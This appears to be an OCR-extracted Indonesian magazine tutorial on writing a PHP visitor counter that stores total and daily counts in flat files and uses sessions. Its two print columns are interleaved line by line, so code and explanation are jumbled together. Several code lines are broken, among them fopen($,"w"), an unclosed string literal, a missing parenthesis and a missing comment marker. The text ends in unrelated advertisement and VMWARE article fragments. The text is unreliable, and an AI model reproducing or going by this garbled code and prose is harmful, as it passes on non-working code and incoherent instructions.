chmod($x,0644);//file yang akan dibaca diubah modenya supaya dapat tama. Masih ada satu kemungkinan lagi yaitu kemungkinan
//dibaca yang kedua jika file tidak ditemukan. Langkah yang kita
$bfile=fopen($x,"r");//koneksi terhadap file
lakukan adalah dengan membuat file baru dengan nilai awal.
Caranya dengan menggunakan fungsi fopen() dengan mode
$bcfile=fread($bfile,filesize($x));//proses membaca isi file
w, yaitu meletakkan pointer di awal file, untuk membuat
fclose($bfile);//menutup koneksi terhadap file sebuah file teks baru dengan nama file yang akan kita baca,
return $bcfile;// mengembalikan nilai fungsi kepada nilai variabel apakah itu total.db.php ataukah harian.db.php. Selanjutnya
//$bcfile kita kembali dihadapkan pada pilihan isi dari file baru yang
} else { akan kita buat, karena seperti yang telah kita kemukakan di
$bfile=fopen($,"w");//membuat file baru atas isi antara file total.db.php dengan file harian.db.php
if($x=="total.db.php){ adalah tidak sama polanya.
$strfile="<?#1#?>//string yang dituliskan pada file total.db.php Dengan demikian percabangan dengan if…else kembali men-
} else { jadi solusi. Pertama kita anggap file adalah total.db.php. Jika
$strfile="<?#01052002#1#?>//isi file harian.db.php kondisi ini benar maka kita menentukan suatu variabel baru,
}
yaitu variabel $strfile dengan nilai isi awal dari file total.db.php.
Sebaliknya jika ternyata kondisi salah maka kita akan meng-
$tfile=fwrite($bfile,$strfile,strlen($strfile);//proses penulisan
isikan kedalam variabel tersebut isi awal dari file harian.db.php.
fclose($bfile); Selesailah masalah pemilihan isi file ini. Selanjutnya proses
return $strfile;//jika file tidak ada maka fungsi dikembalikan ke penulisan file kita lakukan dengan fungsi fwrite(). Masalah
//string awal kembali muncul karena dengan fungsi ini kita harus menen-
} tukan panjang karakter yang akan dituliskan, sementara
} karakter yang akan kita tuliskan tidak dapat kita pastikan
?> karena harus melalui percabangan terlebih dahulu. Namun
masalah ini kemudain menjadi selesai karena kita dapat
Keterangan: menggunakan fungsi strlen() untuk menentukan panjang
string dalam suatu variabel.
Secara ringkas cara kerja dari fungsi baca file di atas adalah,
pertama file menerima sebuah variabel input berupa nama Setelah itu koneksi terhadap file kita tutup dengan fungsi
file yang akan dibaca isinya, yang kemudian dilakukan per- fclose(). Dan nilai dari fungsi kita kembalikan ke nilai varia-
tama kali adalah mengecek apakah file itu ada ataukan tidak. bel $strfile. Dengan demikian selesailah percabangan untuk
Langkah ini dimaksudkan untuk berjaga-jaga, barangkali kemungkinan yang kedua, yang sekaligus selesai pulalah
saja kita lupa mengupload file database, maka bisa dibuatkan fungsi kita yang pertama, bacafile().
file baru nantinya.
• tulisfile()
Selanjutnya dengan percabangan if…else kita membuat
percabangan. Kemungkinan pertama yaitu file telah ada, Fungsi yang kita gunakan untuk menulis isi file-file database
kemungkinan yang kedua file tidak ada. Untuk kemungkin- Fungsi ini kita namakan sebagai fungsi tulisfile(), berikut
an yang pertama mula-mula kita harus meyakinkan dulu adalah source code-nya :
apakah file tersebut bisa terbaca atau tidak yaitu dengan
mengubah modenya menjadi 0644, sehingga yakinlah kita <?php
kalau kita punya wewenang penuh untuk membaca file function tulisfile($x,$y){
tersebut. Langkah ini kita lakukan dengan menggunakan //cek apakah string yang akan dituliskan ada nilainya?
fungsi chmod(). if($x!=""){
Proses pembacaan kita mulai dengan membuka koneksi //cek apakah file yang akan ditulisi ada?
terhadap file dengan fungsi fopen(), dengan dengan mode r, if(file_exists($y)){
artinya kita hanya akan membaca file tersebut saja dengan chmod($y,0644);//ubah mode file supaya dapat terbaca,
meletakkan pointer dari awal file. Setelah koneksi terjalin, //hanya jika file sudah ada
maka proses pembacaan file itu sendiri mulai kita lakukan }
dengan menggunakan fungsi fread(). Dengan fungsi fread() $bfile=fopen($y,"w");//koneksi ke file
ini, kita harus menentukan seberapa banyak karakter yang
fwrite($bfile,$x,strlen($x));//proses menulis
harus kita baca, tentunya kita tidak bisa menetapkannya
dengan pasti karena sifat file database yang selalu berubah- fclose($bfile);//menutup koneksi
ubah isi datanya. Untunglah suatu file teks besar filenya }
dalam byte sangat identik dengan jumlah karakter yang }
tertulis dalam file tersebut, sehingga kita bisa menetapkan ?>
banyaknya karakter yang harus dibaca adalah sejumlah
sama dengan besar file tersebut dalam byte. Karena pada Keterangan:
dasarnya file basisdata kita ini adalah file teks biasa maka Secara ringkas kita dapat memahami source code di atas
kita dapat menetapkan cara ini. Fungsi yang bisa kita sebagai berikut. Pertama kita asumsikan bahwa nilai yang
gunakan untuk menetukan besarnya file yang akan dibaca akan kita tuliskan ke file tidak boleh merupakan string ko-
dalam byte adalah fungsi filesize(). Sehingga masalah ini song, sehingga dengan statement if kita akan membuat pi-
menjadi selesai. Hasil pembacaan kita simpan dalam sebuah lihan apakan proses penulisan akan dilaksanakan atau tidak.
variabel yang kita namakan sebagai variabel $hbaca. Lalu
Cukup kita lakukan dengan memberi kondisi bahwa nilai va- Keterangan:
riabel $x tidak kosong. Jika kondisi ini terpenuhi maka pro- Secara algoritma source code di atas dapat kita pahami sebagai
ses penulisan akan dilakukan oleh fungsi, namun jika kondisi berikut.
ini tidak terpenuhi, maka fungsi tidak akan melakukan proses
penulisan. Sekarang jika kondisi terpenuhi maka langkah Pada langkah pertama kita membaca kedua file database, baik
selanjutnya adalah kita menentukan pilihan kembali apakah yang total maupun yang harian. Proses pembacaan akan kita
kita perlu mengubah mode file ataukah tidak. lakukan dengan menggunakan fungsi bacafile() yang telah kita
definisikan sebelumnya.
Jika file sudah ada, ada baiknya untuk jaga-jaga kita ubah da-
hulu mode file sehingga kita yakin betul kita punya wewenang Hasil pembacaan terhadap dua file kita simpan dalam variabel-
penuh untuk menulis file tersebut. Namun jika file tersebut variabel, masing-masing yaitu variabel $baca1 untuk database
belum ada maka justru kita tidak boleh melakukan langkah total, dan variabel $baca2 untuk database harian. Selanjutnya
ini karena akan menyebabkan error dalam fungsi kita ini. hasil baca dari file harus kita pecah-pecah menjadi suatu array
assosiatif, sehingga kita bisa mengambil data yang ada di da-
Untuk itu kembali dengan statement If kita dapat menentu- lamnya. Langkah ini kita lakukan dengan fungsi explode(),
kan apakah langkah ini akan dilakukan ataukah dilewati dengan pemecah yaitu karakter tanda pagar (#). Hasilnya kita
begitu saja. Caranya yaitu dengan memberi kondisi bahwa simpan dalam masing-masing variabel $h1 dan $h2. Variabel
file tersebut telah ada. Jika kondisi ini benar maka langkah $h1 akan merupakan suatu array dengan tiga elemen yaitu
mengubah mode fiole akan dilakukan, namun jika kondisi elemen ke-0 berisi string “<?”, elemen ke-1 berisi data total
ini salah maka langkah ini akan dilewati begitu saja. Selan- pengunjung, dan elemen ke-2 akan berisi string “?>” Ingat
jutnya adalah kita membuat koneksi ke file, jika file itu telah dalam PHP indeks array selalu dimulai dari angka nol.
ada atau kita membuat suatu file baru jika file tersebut be-
lum ada yaitu dengan menggunakan fungsi fopen() dengan Nah, dari ketiga elemen tadi kita hanya membutuhkan elemen
mode w. Kemudian proses penulisan dilakukan dengan fung- pertama saja, maka nilai dari elemen yang berindeks satu ini
si fwrite() dengan keterangan analog dengan fungsi sebelum- kita simpan dalam satu variabel khusus yaitu $total_konter.
nya. Dan setelah proses penulisan selesai koneksi terhadap Sekarang variabel $total_konter telah berisi data banyaknya
file kita tutup dengan fungsi fclose(). Maka selesailah fungsi pengunjung total. Dengan menggunakan logika yang sama
kita yang kedua. variabel $h2 akan menjadi suatu array dengan 4 elemen, yaitu
elemen ke-0 yang berisi string “<?”, elemen ke-1 yang berisi
Setelah selesai mendefinisikan fungsi yang akan kita gunakan, data tanggal, elemen ke-2 yang berisi data banyaknya
maka sekarang kita tinggal membuat alur dari aplikasi konter pengunjung hari tersebut, dan elemen ke-3 yang berisi string
kita. Perhatikan source code-nya sebagai berikut: “?>” Dari keempat elemen tersebut yang kita ambil adalah
<?php
elemen ke-1 yang kemudian kita simpan dalam variabel
$f1="total.db.php";//file database yang pertama
$tanggal_konter, dan elemen ke-2 yang kemudian kita simpan
dalam variabel $harian_konter.
$f2="harian.db.php";//file databse yang kedua
$baca1=bacafile($f1);//proses baca file database pertama Selesai sampai di situ proses pembacaan terhadap file-file
$baca2=bacafile($f2); //proses baca file database kedua basisdata. Selanjutnya kita harus mengecek, apakah sesi telah
//memecah hasil baca1 menjadi array assosiatif ada atau tidak. Jika anda bertanya buat apa pengecekan sesi ini?
$h1=explode("#",$baca1); Pengecekan sesi ini sangat berguna bagi kita untuk menentu-
$total_konter=$h1[1];//data pengunjung total kan apakah nilai konter akan dinaikkan atau tidak. Jika sesi te-
//memecah hasil baca2 menjadi array assosiatif lah ada artinya pengunjung tidak pada kali yang pertama mem-
$h2=explode("#",$baca2); buka page situs kita, sehingga jika kita ingin menghitung jumlah
$harian_konter=$h2[2];//data pengunjung hari ini pengunjung secara unik, maka nilai konter tentu saja tidak
$tanggal_konter=$h2[1];//tanggal yang tertera dalam file harian
akan kita naikkan. Sebaliknya jika sesi belum ada maka pengun-
//pengecekan sesi_konter
jung dapat dikatakan sedang membuka halaman situs kita
session_start();
untuk pertama kalinya, maka jumlah konter perlu kita naikkan.
if(!session_is_registered(sesi_konter)){ Dihadapkan pada pilihan seperti ini, yaitu untuk memilih apa-
$sesi_konter="isi";//mengisi variabel sesi dengan suatu nilai kah suatu blok statement harus dieksekusi ataukah tidak maka
session_register("sesi_konter");//registrasi variabel sesi kita dapat menggunakan statement If untuk menyelesaikan
$total_konter++;//nilai konter total dinaikkan masalah ini. Caranya mudah saja yaitu dengan memberi kon-
$str_total="<?#$total_konter#?>";//isi file yang telah diupdate disi bahwa sesi belum terregistrasi atau sebutlah sesi belum
tulisfile($str_total,$f1);//proses update file total.db.php ada. Kita dapat melakukannya dengan menggunakan operator
$sekarang=date("dmY");//melihat tanggal sekarang not (!) pada fungsi file_exist(). Jika kondisi ini benar maka blok
//cek apakah tanggal sekarang sama dengan yang tertera di file? statement pemroses kenaikkan konter dan perubahan pada file
if($tanggal_konter==$sekarang){ database akan dilakukan, namun jika kondisi tidak terpenuhi
$harian_konter++;//konter harian dinaikkan
maka blok statement tersebut akan dilewati begitu saja dan
} else {
nilai-nilai variabel konter tetap sesuai hasil pembacaan
$harian_konter=1;//konter harian dikembalikan ke 1
terhadap file basisdata di awal tadi.
} Sekarang diasumsikan jika kondisi terpenihi, maka proses yang
$str_harian="<?#$sekarang#$harian_konter#?>";//isi file diupdate pertama kali kita lakukan adalah dengan membuat suatu varia-
tulisfile($str_harian,$f2);proses update bel baru yaitu $sesi_konter yang dapat kita isi secara semba-
} rang. Variabel ini kemudian akan kita registrasi sebagai varia-
//tampilkan variabel konter total dan variabel konter harian bel sesi. Registrasi terhadap variabel sesi ini kita lakukan de-
print("Anda adalah pengunjung ke-$harian_konter untuk hari ini, dari total ngan menggunakan fungsi session_register(). Setelah variabel
$total_konter pengunjung situs sampai dengan hari ini."); sesi kita registrasi, langkah selanjutnya adalah menaikkan nilai
?> variabel $total_konter. Penaikkan kita lakukan dengan meng-
gunakan operator Increment. Selanjutnya kita membuat suatu
string yang berpola <?#$total_konter#?> untuk kita tuliskan Kemungkinan pertama, kondisi terpenuhi, artinya tanggal se-
dalam file database total.db.php. Setelah itu proses penulisan karang sama dengan yang tertera di file, maka langkah yang
terhadap file dapat kita lakukan dengan menggunakan fungsi kita ambil adalah menaikkan nilai dari variabel $harian_konter
tulisfile() yang telah kita definisikan sebelumnya. dengan menggunakan operator increment. Sedangkan ke-
Masalah berikutnya adalah menentukan isi dari file harian.db.php mungkinan kedua adalah tanggal hari ini tidak sama dengan
yang akan di-update. File harian.db.php ini dapat dikatakan tanggal yang tertera di file, maka langkah yang kita ambil
unik atau tidak sama dengan file total.db.php, karena dalam file adalah mengembalikan nilai variabel $harian_konter ke 1.
harian.db.php kita menentukan pula tanggal saat data itu ada. Setelah kita dapat menentukan pilihan terhadap nilai variabel
Artinya begitu tanggal berubah, maka total pengunjung harian $harian_konter yang akan diambil selanjutnya kita tinggal
akan kembali lagi ke awal. Sehingga kita perlu mengecek apa- membuat suatu variabel yang akan kita isi dengan string yang
kah tanggal yang tertera di file sama dengan tanggal hari ini? merupakan isi dari file harian.db.php, yaitu dengan format
Pertama kita buat dulu suatu variabel yang kita isi dengan tang- <?#$sekarang#$harian_konter#?>. Selanjutnya proses update
gal hari ini dengan format "ddmmyyyy" dengan mengguna- terhadap file harian.db.php kita lakukan dengan fungsi
kan fungsi built-in date() dengan format "dmY", kita namakan tulisfile(). Sampai di sini selesailah proses terhadap variabel-
variabel $sekarang. Selanjutnya karena ada dua pilihan ekseku- variabel konter.
si yaitu menaikkan nilai konter atau mengembalikan konter ke Langkah terakhir adalah tinggal menuliskan nilai-nilai variabel
nilai awal (dalam hal ini adalah 1) maka kita dapat menggu- konter yang telah diproses atau yang tidak diproses (jika sesi
nakan percabangan if…else untuk menyelesaikan masalah ini. telah ada) dengan menggunakan fungsi print(). Fungsi ini
Kondisi yang kita asumsikan adalah tanggal yang tertera di memiliki fungsi yang hampir sama dengan fungsi echo(), yaitu
file, yaitu yang telah tersimpan dalam variabel $tanggal_konter, menuliskan pada dokumen.
sama dengan tanggal hari ini, yang telah kita simpan juga Referensi:
dalam variabel $sekarang. Ada dua kemungkinan yaitu kondisi www.php.net
terpenuhi atau tidak. Situs resmi PHP. Anda dapat men-download manual PHP.
Iklan VisionNet
17,6 x 9,35 cm
VMWARE 3.1
amu yang dapat dipasangkan pada
T sistem operasi NT/2000/XP di
antaraqnya DOS, Windows 3.1, 95,
98, ME, XP itu sendiri, NT, Windows 2000,
VMWARE 3.1
ntuk mengikutsertakan virtual
U machine pada LAN, lakukan penge-
setan IP address pada virtual adapter
yang dapat diakses pada Properties dari ikon